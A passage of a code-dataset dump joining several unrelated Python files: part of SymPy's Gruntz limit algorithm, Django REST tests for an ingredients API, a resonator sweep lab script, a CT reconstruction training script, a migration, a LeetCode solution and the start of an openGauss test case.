1/_p))/_w, 1/_w]\n > e = exp(exp(_p - exp(-_p))/(1 - 1/_p)) - exp(exp(_p))\n > e.subs(Omega[0],O2[0]).subs(Omega[1],O2[1])\n -1/w + exp(exp(p)*exp(-exp(-p))/(1 - 1/p))\n\n is really not what we want!\n\n So we do it the hard way and keep track of all the things we potentially\n want to substitute by dummy variables. Consider the expression::\n\n exp(x - exp(-x)) + exp(x) + x.\n\n The mrv set is {exp(x), exp(-x), exp(x - exp(-x))}.\n We introduce corresponding dummy variables d1, d2, d3 and rewrite::\n\n d3 + d1 + x.\n\n This class first of all keeps track of the mapping expr->variable, i.e.\n will at this stage be a dictionary::\n\n {exp(x): d1, exp(-x): d2, exp(x - exp(-x)): d3}.\n\n [It turns out to be more convenient this way round.]\n But sometimes expressions in the mrv set have other expressions from the\n mrv set as subexpressions, and we need to keep track of that as well. In\n this case, d3 is really exp(x - d2), so rewrites at this stage is::\n\n {d3: exp(x-d2)}.\n\n The function rewrite uses all this information to correctly rewrite our\n expression in terms of w. In this case w can be chosen to be exp(-x),\n i.e. d2. The correct rewriting then is::\n\n exp(-w)/w + 1/w + x.\n \"\"\"\n def __init__(self):\n self.rewrites = {}\n\n def __repr__(self):\n return super().__repr__() + ', ' + self.rewrites.__repr__()\n\n def __getitem__(self, key):\n if not key in self:\n self[key] = Dummy()\n return dict.__getitem__(self, key)\n\n def do_subs(self, e):\n \"\"\"Substitute the variables with expressions\"\"\"\n for expr, var in self.items():\n e = e.xreplace({var: expr})\n return e\n\n def meets(self, s2):\n \"\"\"Tell whether or not self and s2 have non-empty intersection\"\"\"\n return set(self.keys()).intersection(list(s2.keys())) != set()\n\n def union(self, s2, exps=None):\n \"\"\"Compute the union of self and s2, adjusting exps\"\"\"\n res = self.copy()\n tr = {}\n for expr, var in s2.items():\n if expr in self:\n if exps:\n exps = exps.xreplace({var: res[expr]})\n tr[var] = res[expr]\n else:\n res[expr] = var\n for var, rewr in s2.rewrites.items():\n res.rewrites[var] = rewr.xreplace(tr)\n return res, exps\n\n def copy(self):\n \"\"\"Create a shallow copy of SubsSet\"\"\"\n r = SubsSet()\n r.rewrites = self.rewrites.copy()\n for expr, var in self.items():\n r[expr] = var\n return r\n\n\n@debug\ndef mrv(e, x):\n \"\"\"Returns a SubsSet of most rapidly varying (mrv) subexpressions of 'e',\n and e rewritten in terms of these\"\"\"\n e = powsimp(e, deep=True, combine='exp')\n if not isinstance(e, Basic):\n raise TypeError(\"e should be an instance of Basic\")\n if not e.has(x):\n return SubsSet(), e\n elif e == x:\n s = SubsSet()\n return s, s[x]\n elif e.is_Mul or e.is_Add:\n i, d = e.as_independent(x) # throw away x-independent terms\n if d.func != e.func:\n s, expr = mrv(d, x)\n return s, e.func(i, expr)\n a, b = d.as_two_terms()\n s1, e1 = mrv(a, x)\n s2, e2 = mrv(b, x)\n return mrv_max1(s1, s2, e.func(i, e1, e2), x)\n elif e.is_Pow and e.base != S.Exp1:\n e1 = S.One\n while e.is_Pow:\n b1 = e.base\n e1 *= e.exp\n e = b1\n if b1 == 1:\n return SubsSet(), b1\n if e1.has(x):\n base_lim = limitinf(b1, x)\n if base_lim is S.One:\n return mrv(exp(e1 * (b1 - 1)), x)\n return mrv(exp(e1 * log(b1)), x)\n else:\n s, expr = mrv(b1, x)\n return s, expr**e1\n elif isinstance(e, log):\n s, expr = mrv(e.args[0], x)\n return s, log(expr)\n elif isinstance(e, exp) or (e.is_Pow and e.base == S.Exp1):\n # We know from the theory of this algorithm that exp(log(...)) may always\n # be simplified here, and doing so is vital for termination.\n if isinstance(e.exp, log):\n return mrv(e.exp.args[0], x)\n # if a product has an infinite factor the result will be\n # infinite if there is no zero, otherwise NaN; here, we\n # consider the result infinite if any factor is infinite\n li = limitinf(e.exp, x)\n if any(_.is_infinite for _ in Mul.make_args(li)):\n s1 = SubsSet()\n e1 = s1[e]\n s2, e2 = mrv(e.exp, x)\n su = s1.union(s2)[0]\n su.rewrites[e1] = exp(e2)\n return mrv_max3(s1, e1, s2, exp(e2), su, e1, x)\n else:\n s, expr = mrv(e.exp, x)\n return s, exp(expr)\n elif e.is_Function:\n l = [mrv(a, x) for a in e.args]\n l2 = [s for (s, _) in l if s != SubsSet()]\n if len(l2) != 1:\n # e.g. something like BesselJ(x, x)\n raise NotImplementedError(\"MRV set computation for functions in\"\n \" several variables not implemented.\")\n s, ss = l2[0], SubsSet()\n args = [ss.do_subs(x[1]) for x in l]\n return s, e.func(*args)\n elif e.is_Derivative:\n raise NotImplementedError(\"MRV set computation for derviatives\"\n \" not implemented yet.\")\n raise NotImplementedError(\n \"Don't know how to calculate the mrv of '%s'\" % e)\n\n\ndef mrv_max3(f, expsf, g, expsg, union, expsboth, x):\n \"\"\"\n Computes the maximum of two sets of expressions f and g, which\n are in the same comparability class, i.e. max() compares (two elements of)\n f and g and returns either (f, expsf) [if f is larger], (g, expsg)\n [if g is larger] or (union, expsboth) [if f, g are of the same class].\n \"\"\"\n if not isinstance(f, SubsSet):\n raise TypeError(\"f should be an instance of SubsSet\")\n if not isinstance(g, SubsSet):\n raise TypeError(\"g should be an instance of SubsSet\")\n if f == SubsSet():\n return g, expsg\n elif g == SubsSet():\n return f, expsf\n elif f.meets(g):\n return union, expsboth\n\n c = compare(list(f.keys())[0], list(g.keys())[0], x)\n if c == \">\":\n return f, expsf\n elif c == \"<\":\n return g, expsg\n else:\n if c != \"=\":\n raise ValueError(\"c should be =\")\n return union, expsboth\n\n\ndef mrv_max1(f, g, exps, x):\n \"\"\"Computes the maximum of two sets of expressions f and g, which\n are in the same comparability class, i.e. mrv_max1() compares (two elements of)\n f and g and returns the set, which is in the higher comparability class\n of the union of both, if they have the same order of variation.\n Also returns exps, with the appropriate substitutions made.\n \"\"\"\n u, b = f.union(g, exps)\n return mrv_max3(f, g.do_subs(exps), g, f.do_subs(exps),\n u, b, x)\n\n\n@debug\n@cacheit\n@timeit\ndef sign(e, x):\n \"\"\"\n Returns a sign of an expression e(x) for x->oo.\n\n ::\n\n e > 0 for x sufficiently large ... 1\n e == 0 for x sufficiently large ... 0\n e < 0 for x sufficiently large ... -1\n\n The result of this function is currently undefined if e changes sign\n arbitrarily often for arbitrarily large x (e.g. sin(x)).\n\n Note that this returns zero only if e is *constantly* zero\n for x sufficiently large. [If e is constant, of course, this is just\n the same thing as the sign of e.]\n \"\"\"\n if not isinstance(e, Basic):\n raise TypeError(\"e should be an instance of Basic\")\n\n if e.is_positive:\n return 1\n elif e.is_negative:\n return -1\n elif e.is_zero:\n return 0\n\n elif not e.has(x):\n e = logcombine(e)\n return _sign(e)\n elif e == x:\n return 1\n elif e.is_Mul:\n a, b = e.as_two_terms()\n sa = sign(a, x)\n if not sa:\n return 0\n return sa * sign(b, x)\n elif isinstance(e, exp):\n return 1\n elif e.is_Pow:\n if e.base == S.Exp1:\n return 1\n s = sign(e.base, x)\n if s == 1:\n return 1\n if e.exp.is_Integer:\n return s**e.exp\n elif isinstance(e, log):\n return sign(e.args[0] - 1, x)\n\n # if all else fails, do it the hard way\n c0, e0 = mrv_leadterm(e, x)\n return sign(c0, x)\n\n\n@debug\n@timeit\n@cacheit\ndef limitinf(e, x, leadsimp=False):\n \"\"\"Limit e(x) for x-> oo.\n\n Explanation\n ===========\n\n If ``leadsimp`` is True, an attempt is made to simplify the leading\n term of the series expansion of ``e``. That may succeed even if\n ``e`` cannot be simplified.\n \"\"\"\n # rewrite e in terms of tractable functions only\n\n if not e.has(x):\n return e # e is a constant\n if e.has(Order):\n e = e.expand().removeO()\n if not x.is_positive or x.is_integer:\n # We make sure that x.is_positive is True and x.is_integer is None\n # so we get all the correct mathematical behavior from the expression.\n # We need a fresh variable.\n p = Dummy('p', positive=True)\n e = e.subs(x, p)\n x = p\n e = e.rewrite('tractable', deep=True, limitvar=x)\n e = powdenest(e)\n c0, e0 = mrv_leadterm(e, x)\n sig = sign(e0, x)\n if sig == 1:\n return S.Zero # e0>0: lim f = 0\n elif sig == -1: # e0<0: lim f = +-oo (the sign depends on the sign of c0)\n if c0.match(I*Wild(\"a\", exclude=[I])):\n return c0*oo\n s = sign(c0, x)\n # the leading term shouldn't be 0:\n if s == 0:\n raise ValueError(\"Leading term should not be 0\")\n return s*oo\n elif sig == 0:\n if leadsimp:\n c0 = c0.simplify()\n return limitinf(c0, x, leadsimp) # e0=0: lim f = lim c0\n else:\n raise ValueError(\"{} could not be evaluated\".format(sig))\n\n\ndef moveup2(s, x):\n r = SubsSet()\n for expr, var in s.items():\n r[expr.xreplace({x: exp(x)})] = var\n for var, expr in s.rewrites.items():\n r.rewrites[var] = s.rewrites[var].xreplace({x: exp(x)})\n return r\n\n\ndef moveup(l, x):\n return [e.xreplace({x: exp(x)}) for e in l]\n\n\n@debug\n@timeit\ndef calculate_series(e, x, logx=None):\n \"\"\" Calculates at least one term of the series of ``e`` in ``x``.\n\n This is a place that fails most often, so it is in its own function.\n \"\"\"\n from sympy.polys import cancel\n\n for t in e.lseries(x, logx=logx):\n # bottom_up function is required for a specific case - when e is\n # -exp(p/(p + 1)) + exp(-p**2/(p + 1) + p). No current simplification\n # methods reduce this to 0 while not expanding polynomials.\n t = bottom_up(t, lambda w: getattr(w, 'normal', lambda: w)())\n t = cancel(t, expand=False).factor()\n\n if t.has(exp) and t.has(log):\n t = powdenest(t)\n\n if not t.is_zero:\n break\n\n return t\n\n\n@debug\n@timeit\n@cacheit\ndef mrv_leadterm(e, x):\n \"\"\"Returns (c0, e0) for e.\"\"\"\n Omega = SubsSet()\n if not e.has(x):\n return (e, S.Zero)\n if Omega == SubsSet():\n Omega, exps = mrv(e, x)\n if not Omega:\n # e really does not depend on x after simplification\n return exps, S.Zero\n if x in Omega:\n # move the whole omega up (exponentiate each term):\n Omega_up = moveup2(Omega, x)\n exps_up = moveup([exps], x)[0]\n # NOTE: there is no need to move this down!\n Omega = Omega_up\n exps = exps_up\n #\n # The positive dummy, w, is used here so log(w*2) etc. will expand;\n # a unique dummy is needed in this algorithm\n #\n # For limits of complex functions, the algorithm would have to be\n # improved, or just find limits of Re and Im components separately.\n #\n w = Dummy(\"w\", real=True, positive=True)\n f, logw = rewrite(exps, Omega, x, w)\n series = calculate_series(f, w, logx=logw)\n try:\n lt = series.leadterm(w, logx=logw)\n except (ValueError, PoleError):\n lt = f.as_coeff_exponent(w)\n # as_coeff_exponent won't always split in required form. It may simply\n # return (f, 0) when a better form may be obtained. Example (-x)**(-pi)\n # can be written as (-1**(-pi), -pi) which as_coeff_exponent does not return\n if lt[0].has(w):\n base = f.as_base_exp()[0].as_coeff_exponent(w)\n ex = f.as_base_exp()[1]\n lt = (base[0]**ex, base[1]*ex)\n return (lt[0].subs(log(w), logw), lt[1])\n\n\ndef build_expression_tree(Omega, rewrites):\n r\"\"\" Helper function for rewrite.\n\n We need to sort Omega (mrv set) so that we replace an expression before\n we replace any expression in terms of which it has to be rewritten::\n\n e1 ---> e2 ---> e3\n \\\n -> e4\n\n Here we can do e1, e2, e3, e4 or e1, e2, e4, e3.\n To do this we assemble the nodes into a tree, and sort them by height.\n\n This function builds the tree, rewrites then sorts the nodes.\n \"\"\"\n class Node:\n def __init__(self):\n self.before = []\n self.expr = None\n self.var = None\n def ht(self):\n return reduce(lambda x, y: x + y,\n [x.ht() for x in self.before], 1)\n nodes = {}\n for expr, v in Omega:\n n = Node()\n n.var = v\n n.expr = expr\n nodes[v] = n\n for _, v in Omega:\n if v in rewrites:\n n = nodes[v]\n r = rewrites[v]\n for _, v2 in Omega:\n if r.has(v2):\n n.before.append(nodes[v2])\n\n return nodes\n\n\n@debug\n@timeit\ndef rewrite(e, Omega, x, wsym):\n \"\"\"e(x) ... the function\n Omega ... the mrv set\n wsym ... the symbol which is going to be used for w\n\n Returns the rewritten e in terms of w and log(w). See test_rewrite1()\n for examples and correct results.\n \"\"\"\n if not isinstance(Omega, SubsSet):\n raise TypeError(\"Omega should be an instance of SubsSet\")\n if len(Omega) == 0:\n raise ValueError(\"Length cannot be 0\")\n # all items in Omega must be exponentials\n for t in Omega.keys():\n if not isinstance(t, exp):\n raise ValueError(\"Value should be exp\")\n rewrites = Omega.rewrites\n Omega = list(Omega.items())\n\n nodes = build_expression_tree(Omega, rewrites)\n Omega.sort(key=lambda x: nodes[x[1]].ht(), reverse=True)\n\n # make sure we know the sign of each exp() term; after the loop,\n # g is going to be the \"w\" - the simplest one in the mrv set\n for g, _ in Omega:\n sig = sign(g.exp, x)\n if sig != 1 and sig != -1:\n raise NotImplementedError('Result depends on the sign of %s' % sig)\n if sig == 1:\n wsym = 1/wsym # if g goes to oo, substitute 1/w\n # O2 is a list, which results by rewriting each item in Omega using \"w\"\n O2 = []\n denominators = []\n for f, var in Omega:\n c = limitinf(f.exp/g.exp, x)\n if c.is_Rational:\n denominators.append(c.q)\n arg = f.exp\n if var in rewrites:\n if not isinstance(rewrites[var], exp):\n raise ValueError(\"Value should be exp\")\n arg = rewrites[var].args[0]\n O2.append((var, exp((arg - c*g.exp).expand())*wsym**c))\n\n # Remember that Omega contains subexpressions of \"e\". So now we find\n # them in \"e\" and substitute them for our rewriting, stored in O2\n\n # the following powsimp is necessary to automatically combine exponentials,\n # so that the .xreplace() below succeeds:\n # TODO this should not be necessary\n f = powsimp(e, deep=True, combine='exp')\n for a, b in O2:\n f = f.xreplace({a: b})\n\n for _, var in Omega:\n assert not f.has(var)\n\n # finally compute the logarithm of w (logw).\n logw = g.exp\n if sig == 1:\n logw = -logw # log(w)->log(1/w)=-log(w)\n\n # Some parts of SymPy have difficulty computing series expansions with\n # non-integral exponents. The following heuristic improves the situation:\n exponent = reduce(ilcm, denominators, 1)\n f = f.subs({wsym: wsym**exponent})\n logw /= exponent\n\n return f, logw\n\n\ndef gruntz(e, z, z0, dir=\"+\"):\n \"\"\"\n Compute the limit of e(z) at the point z0 using the Gruntz algorithm.\n\n Explanation\n ===========\n\n ``z0`` can be any expression, including oo and -oo.\n\n For ``dir=\"+\"`` (default) it calculates the limit from the right\n (z->z0+) and for ``dir=\"-\"`` the limit from the left (z->z0-). For infinite z0\n (oo or -oo), the dir argument doesn't matter.\n\n This algorithm is fully described in the module docstring in the gruntz.py\n file. It relies heavily on the series expansion. Most frequently, gruntz()\n is only used if the faster limit() function (which uses heuristics) fails.\n \"\"\"\n if not z.is_symbol:\n raise NotImplementedError(\"Second argument must be a Symbol\")\n\n # convert all limits to the limit z->oo; sign of z is handled in limitinf\n r = None\n if z0 == oo:\n e0 = e\n elif z0 == -oo:\n e0 = e.subs(z, -z)\n else:\n if str(dir) == \"-\":\n e0 = e.subs(z, z0 - 1/z)\n elif str(dir) == \"+\":\n e0 = e.subs(z, z0 + 1/z)\n else:\n raise NotImplementedError(\"dir must be '+' or '-'\")\n\n try:\n r = limitinf(e0, z)\n except ValueError:\n r = limitinf(e0, z, leadsimp=True)\n\n # This is a bit of a heuristic for nice results... we always rewrite\n # tractable functions in terms of familiar intractable ones.\n # It might be nicer to rewrite the exactly to what they were initially,\n # but that would take some work to implement.\n return r.rewrite('intractable', deep=True)\n"} {"ext": "py", "sha": "1a2fed1e3ee2c697484cfb881c4f54cc98e55ef3", "content": "from .control_sequence import ControlSequence\nfrom .formatter import format_table\n\n\nclass DocumentClass(ControlSequence):\n def __init__(self, name, descr=''):\n ControlSequence.__init__(self, name, descr)\n # A document class may have options.\n self.has_opts = True\n return\n"} {"ext": "py", "sha": "1a2fed5be55c9adffa50acb62c7dc0bd99897820", "content": "from unicodedata import name\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Ingredient,Recipe\nfrom recipe.serializers import IngredientSerializer\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\nclass PublicIngredientsApiTests(TestCase):\n #Test tha publicly available ingredients API\n\n def setUp(self):\n self.client = APIClient()\n\n def test_login_required(self):\n #Test tha login is required to access the endpoint\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\nclass PrivateIngredientsApiTests(TestCase):\n # Test that private ingredient api \n \n def setUp(self) -> None:\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n 'test@gmail.com',\n 'pss123'\n )\n self.client.force_authenticate(self.user)\n \n def test_retrive_ingredient_list(self):\n #Test that retrivinng the list of ingredients\n Ingredient.objects.create(user = self.user,name='Kale') \n Ingredient.objects.create(user = self.user,name='Salt') \n\n res = self.client.get(INGREDIENTS_URL)\n\n ingredients = Ingredient.objects.all().order_by('-name')\n serializer = IngredientSerializer(ingredients, many=True)\n self.assertEqual(res.status_code,status.HTTP_200_OK)\n self.assertEqual(res.data,serializer.data)\n \n\n def test_ingredients_limits_to_user(self):\n #Test that ingredients for authenticated user and return it\n user2 = get_user_model().objects.create_user(\n 'other@gamil.com'\n 'pass321'\n )\n\n Ingredient.objects.create(user=user2,name='Vinegar')\n ingredient = Ingredient.objects.create(user = self.user,name = 'Tumeric')\n\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code,status.HTTP_200_OK)\n self.assertEqual(len(res.data),1)\n self.assertEqual(res.data[0]['name'], ingredient.name)\n \n def test_create_ingredient_successful(self):\n #Test creating a new ingredient\n payload = {'name':'Cabbage'}\n self.client.post(INGREDIENTS_URL,payload)\n exists = Ingredient.objects.filter(\n user=self.user,\n name=payload['name'] \n ).exists()\n self.assertTrue(exists)\n \n def test_create_ingredient_invalid(self):\n #Test creating a new ingredient with invalid payload\n payload = {'name':''}\n res = self.client.post(INGREDIENTS_URL,payload)\n \n self.assertEqual(res.status_code,status.HTTP_400_BAD_REQUEST)\n \n def test_retrieve_ingredients_assigned_to_recipes(self):\n #Test filtering ingredients by those assigned to recipes\n ingredient1 = Ingredient.objects.create(user=self.user,name='Apples')\n ingredient2 = Ingredient.objects.create(user=self.user,name='Turkey')\n\n recipe = Recipe.objects.create(\n title ='Apple crumble',\n time_minutes=5,\n price=10,\n user = self.user\n )\n recipe.ingredients.add(ingredient1)\n\n res = self.client.get(INGREDIENTS_URL, {'assigned_only':1})\n\n serializer1 = IngredientSerializer(ingredient1)\n serializer2 = IngredientSerializer(ingredient2)\n self.assertIn(serializer1.data, res.data)\n self.assertNotIn(serializer2.data, res.data)\n \n def test_retreive_ingredients_assigned_unique(self):\n #Test filtering ingredients by assigned return unique items\n ingredient = Ingredient.objects.create(user=self.user,name='Eggs')\n Ingredient.objects.create(user=self.user,name='Cheese')\n\n recipe1 = Recipe.objects.create(\n title = 'Eggs benedict',\n time_minutes = 30,\n price = 12.00,\n user=self.user\n )\n recipe1.ingredients.add(ingredient)\n\n recipe2 = Recipe.objects.create(\n title = 'Coriander eggs',\n time_minutes=20,\n price=5.00,\n user=self.user\n )\n recipe2.ingredients.add(ingredient)\n\n res = self.client.get(INGREDIENTS_URL,{'assigned_only':1})\n\n self.assertEqual(len(res.data),1)"} {"ext": "py", "sha": "1a2fee16fc06e4ddbb7103d84074920037c39442", "content": "import time\n\nimport numpy as np\nfrom equipment.custom import mmwave_source\nfrom equipment.hittite import signal_generator\nfrom equipment.srs import lockin\nfrom xystage import stepper\n\n\nfrom kid_readout.interactive import *\nfrom kid_readout.equipment import hardware\nfrom kid_readout.measurement import mmw_source_sweep, core, acquire\n\nlogger.setLevel(logging.DEBUG)\n\n# fg = FunctionGenerator()\n#hittite = signal_generator.Hittite(ipaddr='192.168.0.200')\n#hittite.set_power(0)\n#hittite.on()\nlockin = lockin.Lockin(LOCKIN_SERIAL_PORT)\ntic = time.time()\n# lockin.sensitivity = 17\nprint lockin.identification\nprint lockin.identification\n# print time.time()-tic\n# tic = time.time()\n# print lockin.state(measurement_only=True)\n# print time.time()-tic\nsource = mmwave_source.MMWaveSource()\nsource.set_attenuator_turns(6.0,6.0)\nsource.multiplier_input = 'thermal'\nsource.waveguide_twist_angle = 0\nsource.ttl_modulation_source = 'roach'\n\nhwp_motor = stepper.SimpleStepper(port='/dev/ttyACM2')\n\nsetup = hardware.Hardware(hwp_motor, source, lockin)\n\nri = Roach2Baseband()\n\nri.set_modulation_output(7)\n\ninitial_f0s = np.load('/data/readout/resonances/2017-06-JPL-8x8-LF-N1_single_horn_4.npy')/1e6\n\n\nnf = len(initial_f0s)\natonce = 4\nif nf % atonce > 0:\n print \"extending list of resonators to make a multiple of \", atonce\n initial_f0s = np.concatenate((initial_f0s, np.arange(1, 1 + atonce - (nf % atonce)) + initial_f0s.max()))\n\n\nprint len(initial_f0s)\n\nnsamp = 2**20\noffsets = np.arange(-16,16)*512./nsamp\n\nlast_f0s = initial_f0s\n\nmmw_freqs = np.linspace(140e9, 165e9, 128)\n\nri.set_dac_atten(35)\n\n\ntic = time.time()\nf0s = initial_f0s\n#setup.hittite.off()\n\n#high is off for initital\nri.set_modulation_output('high')\n\nncf_source_off = new_nc_file(suffix= 'mmw_broadband_source_off')\n\nprint f0s\n\nswpa = acquire.run_sweep(ri,tone_banks=f0s[None,:]+offsets[:,None],num_tone_samples=nsamp,\n length_seconds=0.2,\n verbose=True, state=setup.state())\n\nprint \"resonance sweep done\", (time.time()-tic)/60.\n\nprint \"sweep written\", (time.time()-tic)/60.\ncurrent_f0s = []\nfor sidx in range(swpa.num_channels):\n swp = swpa.sweep(sidx)\n res = swp.resonator\n print res.f_0, res.Q, res.delay*1e6, res.current_result.redchi, (f0s[sidx]*1e6-res.f_0)\n if np.abs(f0s[sidx]*1e6-res.f_0) > 100e3:\n current_f0s.append(f0s[sidx]*1e6)\n logger.info(\"Resonator index %d moved more than 100 kHz, keeping original value %.1f MHz\" % (sidx,\n f0s[sidx]))\n else:\n current_f0s.append(res.f_0)\nprint \"fits complete\", (time.time()-tic)/60.\ncurrent_f0s = np.array(current_f0s)/1e6\ncurrent_f0s.sort()\nbad_deltas = np.diff(current_f0s) < (256./2**14)*8\nif bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n bad_deltas = np.diff(current_f0s) < (256./2**14)*8\n if bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n\nri.set_tone_freqs(current_f0s,nsamp=nsamp)\nri.select_fft_bins(range(len(current_f0s)))\nprint ri.fpga_fft_readout_indexes\nprint np.diff(ri.fpga_fft_readout_indexes.astype('float')).min()\n\nmeas = ri.get_measurement(num_seconds=30)\nmeas.state = setup.state(fast=True)\n\nsweep_stream_array = basic.SweepStreamArray(sweep_array = swpa, stream_array = meas, state = meas.state, description= 'source off')\nncf_source_off.write(sweep_stream_array)\nncf_source_off.close()\n\nturnlist = np.arange(9,-0.1,-0.5)\n\n#turnlist = [9,5,1]\n\nturnlist = [3]\n\n\nfor turn_num in turnlist:\n ri.set_modulation_output(7)\n raw_input('set attenuator knobs to %f turns & check lock-in range' %turn_num)\n source.set_attenuator_turns(turn_num, turn_num)\n #turn on source\n ri.set_modulation_output('low')\n ncf = new_nc_file(suffix='mmw_broadband_source_on_%.2f_turns' %turn_num)\n\n swpa = acquire.run_sweep(ri, tone_banks=f0s[None, :] + offsets[:, None], num_tone_samples=nsamp,\n length_seconds=0.2,\n verbose=True, state=setup.state())\n print \"resonance sweep done\", (time.time() - tic) / 60.\n\n print \"sweep written\", (time.time() - tic) / 60.\n current_f0s = []\n for sidx in range(swpa.num_channels):\n swp = swpa.sweep(sidx)\n res = swp.resonator\n print res.f_0, res.Q, res.delay * 1e6, res.current_result.redchi, (f0s[sidx] * 1e6 - res.f_0)\n if np.abs(f0s[sidx] * 1e6 - res.f_0) > 100e3:\n current_f0s.append(f0s[sidx] * 1e6)\n logger.info(\"Resonator index %d moved more than 100 kHz, keeping original value %.1f MHz\" % (sidx,\n f0s[sidx]))\n else:\n current_f0s.append(res.f_0)\n print \"fits complete\", (time.time() - tic) / 60.\n current_f0s = np.array(current_f0s) / 1e6\n current_f0s.sort()\n bad_deltas = np.diff(current_f0s) < (256. / 2 ** 14) * 8\n if bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n bad_deltas = np.diff(current_f0s) < (256. / 2 ** 14) * 8\n if bad_deltas.sum():\n print \"found bad deltas\", bad_deltas.sum()\n current_f0s[np.nonzero(bad_deltas)] -= 0.1\n\n ri.set_tone_freqs(current_f0s, nsamp=nsamp)\n ri.select_fft_bins(range(len(current_f0s)))\n print ri.fpga_fft_readout_indexes\n print np.diff(ri.fpga_fft_readout_indexes.astype('float')).min()\n\n meas = ri.get_measurement(num_seconds=30)\n #turn on modulation to get zbd voltage\n ri.set_modulation_output(7)\n time.sleep(2)\n\n sweep_stream_array = basic.SweepStreamArray(sweep_array=swpa, stream_array=meas, state=setup.state(fast=True),\n description='source on')\n ncf.write(sweep_stream_array)\n\n meas = ri.get_measurement(num_seconds=30)\n meas.state = setup.state(fast=True)\n\n sweep_stream_array = basic.SweepStreamArray(sweep_array=swpa, stream_array=meas, state=meas.state,\n description='chopped')\n ncf.write(sweep_stream_array)\n\n ncf.close()"} {"ext": "py", "sha": "1a2fef043bb60b57d450dba7201945e2b51ef1aa", "content": "\nimport random\n\nfrom tqdm import tqdm\nimport glob\nimport numpy as np\nimport torch\nfrom sparse_ct.reconstructor_2d.n2self import (\n N2SelfReconstructor)\nfrom sparse_ct.reconstructor_2d.dataset import (\n DeepLesionDataset, EllipsesDataset)\n\n\nif __name__ == \"__main__\":\n\n params= {'batch_size': 8,\n 'shuffle': True,\n 'num_workers': 8}\n N_PROJ = 64\n pwd_train = '/external/CT_30_000/train'\n pwd_test = '/external/CT_30_000/test'\n\n file_list_train = glob.glob(pwd_train+'/*/*/*/*.png')\n file_list_test = glob.glob(pwd_test+'/*/*/*/*.png')\n print(\"file_list_train\", len(file_list_train))\n print(\"file_list_test\", len(file_list_test))\n\n # train_loader = torch.utils.data.DataLoader(\n # DeepLesionDataset(\n # file_list_train, \n # return_gt=False,\n # n_proj=N_PROJ,\n # img_size=512),\n # **params\n # )\n\n # test_loader = torch.utils.data.DataLoader(\n # DeepLesionDataset(\n # random.choices(file_list_test, k=1000), \n # return_gt=True,\n # n_proj=N_PROJ,\n # img_size=512),\n # **params\n # )\n\n train_loader = torch.utils.data.DataLoader(\n EllipsesDataset(\n ellipses_type='train', \n return_gt=False,\n n_proj=N_PROJ,\n img_size=512),\n **params\n )\n\n test_loader = torch.utils.data.DataLoader(\n EllipsesDataset(\n ellipses_type='validation',\n return_gt=True,\n n_proj=N_PROJ,\n img_size=512),\n **params\n )\n\n theta = np.linspace(0.0, 180.0, N_PROJ, endpoint=False)\n recon_n2self = N2SelfReconstructor(\n 'N2SelfTrained',\n net='unet', lr=0.0001,\n n2self_weights=None,#'selfsuper-ellipses-64-l1-train1/iter_180000.pth',#'iter_15000.pth',\n #'selfsuper-ellipses-64-train8/iter_58800.pth', #'self-super-train9/iter_199800.pth',\n learnable_filter=False\n )\n recon_n2self.init_train(theta)\n recon_n2self._eval(test_loader)\n\n for i in range(50):\n print('--------------- ',i)\n recon_n2self._train_one_epoch(train_loader, test_loader)\n recon_n2self._eval(test_loader)\n recon_n2self._save('epoch_{}.pth'.format(i))\n recon_n2self._save('end.pth')\n"} {"ext": "py", "sha": "1a2feff3c24738113364bd8043fa2206d4733889", "content": "# Generated by Django 4.0.1 on 2022-02-08 00:49\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('items', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='item',\n name='ocultar',\n field=models.BooleanField(default=True),\n ),\n ]\n"} {"ext": "py", "sha": "1a2ff1878fb5b2ace84def751fd6818c96ee7e46", "content": "# Hash Table; Bit Manipulation\n\n# Given two strings s and t which consist of only lowercase letters.\n#\n# String t is generated by random shuffling string s and then add one more letter at a random position.\n#\n# Find the letter that was added in t.\n#\n# Example:\n#\n# Input:\n# s = \"abcd\"\n# t = \"abcde\"\n#\n# Output:\n# e\n#\n# Explanation:\n# 'e' is the letter that was added.\nclass Solution(object):\n def findTheDifference(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n sMap = collections.Counter(s)\n tMap = collections.Counter(t)\n for x in tMap:\n if x not in sMap or tMap[x] != sMap[x]:\n return x\n return None\n"} {"ext": "py", "sha": "1a2ff1b61ed8184e6edaf2a24430eb7123687cc3", "content": "\"\"\"\nCopyright (c) 2022 Huawei Technologies Co.,Ltd.\n\nopenGauss is licensed under Mulan PSL v2.\nYou can use this software according to the terms and conditions of the Mulan PSL v2.\nYou may obtain a copy of Mulan PSL v2 at:\n\n http://license.coscl.org.cn/MulanPSL2\n\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND,\nEITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,\nMERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.\nSee the Mulan PSL v2 for more details.\n\"\"\"\n\"\"\"\nCase Type : 功能测试\nCase Name : overlay函数入参为中文字符\nDescription : \n 1.使用overlay函数对中文字符进行处理\nExpect : \n 1.返回结果正确\nHistory : \n\"\"\"\n\nimport unittest\nimport sys\nfrom yat.test import Node\nfrom yat.test import macro\n\nsys.path.append(sys.path[0] + \"/../\")\nfrom testcase.utils.Logger import Logger\nfrom testcase.utils.CommonSH import CommonSH\n\nlogger = Logger()\n\n\nclass Function(unittest.TestCase):\n\n def setUp(self):\n logger.info(\"--------Opengauss_Function_Innerfunc_Overlay_Case0004.py开始执行--------\")\n self.commonsh = CommonSH('dbuser')\n self.userNode = 